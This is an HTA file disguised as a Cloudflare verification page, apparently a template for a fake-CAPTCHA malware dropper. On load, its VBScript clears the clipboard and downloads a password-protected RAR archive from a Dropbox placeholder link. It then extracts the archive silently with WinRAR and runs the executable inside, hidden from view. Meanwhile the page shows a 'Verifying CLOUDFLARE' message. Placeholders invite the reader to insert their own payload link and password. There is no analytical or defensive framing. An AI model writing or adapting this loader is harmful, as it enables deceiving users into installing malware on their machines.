<!DOCTYPE html>
<html>
<head>
    <title>CLOUDFLARE Verification</title>
    <HTA:APPLICATION
        APPLICATIONNAME="CLOUDFLARE Verification"
        BORDER="thin"
        BORDERSTYLE="normal"
        ICON="https://support.google.com/favicon.ico"
        SHOWINTASKBAR="yes"
        SINGLEINSTANCE="yes"
        WINDOWSTATE="normal"
        SCROLL="no"
        SCROLLFLAT="yes"
        SYSMENU="yes"
    />
    <style>
        body {
            font-family: Roboto, helvetica, arial, sans-serif;
            margin: 0;
            padding: 20px;
            text-align: center;
            color: #555;
            box-sizing: border-box;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            width: 100%;
            height: 100%;
        }
        img {
            width: 200px;
            margin-bottom: 20px;
        }
        #error {
            color: red;
        }
        .terms {
            font-size: small;
            color: #555;
        }
        .terms a {
            text-decoration: none;
        }
        .terms a:hover {
            text-decoration: underline;
        }
    </style>
    <script language="VBScript">
    Sub Window_onLoad
        Window.ResizeTo 520, 480
        Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2

        ' Clear clipboard just in case
        Call ClearClipboard

        ' Download the password-protected .rar file from Dropbox
        Call DownloadRAR

        ' Extract the .rar file with password using WinRAR
        Call ExtractRAR

        ' Run the extracted executable (change name as needed)
        Call RunExtractedFile
    End Sub

    Sub ClearClipboard
        Dim objHTML
        Set objHTML = CreateObject("htmlfile")
        objHTML.parentWindow.clipboardData.setData "text", ""
        Set objHTML = Nothing
    End Sub

    Sub DownloadRAR()
        Dim url, filePath, xhttp, stream
        url = "https://www.dropbox.com/s/your_file_path/yourfile.rar?dl=1" ' <-- Put your Dropbox direct download link here
        filePath = "C:\Users\Public\file.rar"

        Set xhttp = CreateObject("MSXML2.XMLHTTP")
        xhttp.Open "GET", url, False
        xhttp.Send

        If xhttp.Status = 200 Then
            Set stream = CreateObject("ADODB.Stream")
            stream.Type = 1 ' Binary
            stream.Open
            stream.Write xhttp.responseBody
            stream.SaveToFile filePath, 2 ' Overwrite if exists
            stream.Close
        Else
            MsgBox "Failed to download file. Status: " & xhttp.Status, vbCritical, "Download Error"
        End If
    End Sub

    Sub ExtractRAR()
        Dim objShell, rarPath, rarFile, extractPath, password, cmd

        ' Adjust this path if WinRAR is installed somewhere else
        rarPath = """C:\Program Files\WinRAR\WinRAR.exe"""

        rarFile = "C:\Users\Public\file.rar"
        extractPath = "C:\Users\Public\extracted\"
        password = "YourPassword" ' <-- Put the password here

        ' Create extraction folder if it doesn't exist
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        If Not objFSO.FolderExists(extractPath) Then
            objFSO.CreateFolder(extractPath)
        End If

        cmd = rarPath & " x -p" & password & " -y " & """" & rarFile & """" & " " & """" & extractPath & """"

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run cmd, 0, True
    End Sub

    Sub RunExtractedFile()
        Dim objShell, exePath

        ' Change "program.exe" to the actual executable you want to run from the extracted folder
        exePath = "C:\Users\Public\extracted\program.exe"

        Set objShell = CreateObject("WScript.Shell")
        objShell.Run Chr(34) & exePath & Chr(34), 0, False
    End Sub
</script>

</head>
<body>
    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/4/4b/Cloudflare_Logo.svg/2560px-Cloudflare_Logo.svg.png" alt="reCAPTCHA Logo">
    <div id="connecting" style="display:block;">
        <p>Verifying CLOUDFLARE, please wait...</p>
    </div>
    <div id="error" style="display:none;">
        <p><b>Failed to connect with the CLOUDFLARE server.</b><br>Try the verification steps again.</p>
    </div>
    <p class="terms">
        <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> - 
        <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
    </p>
</body>
</html>
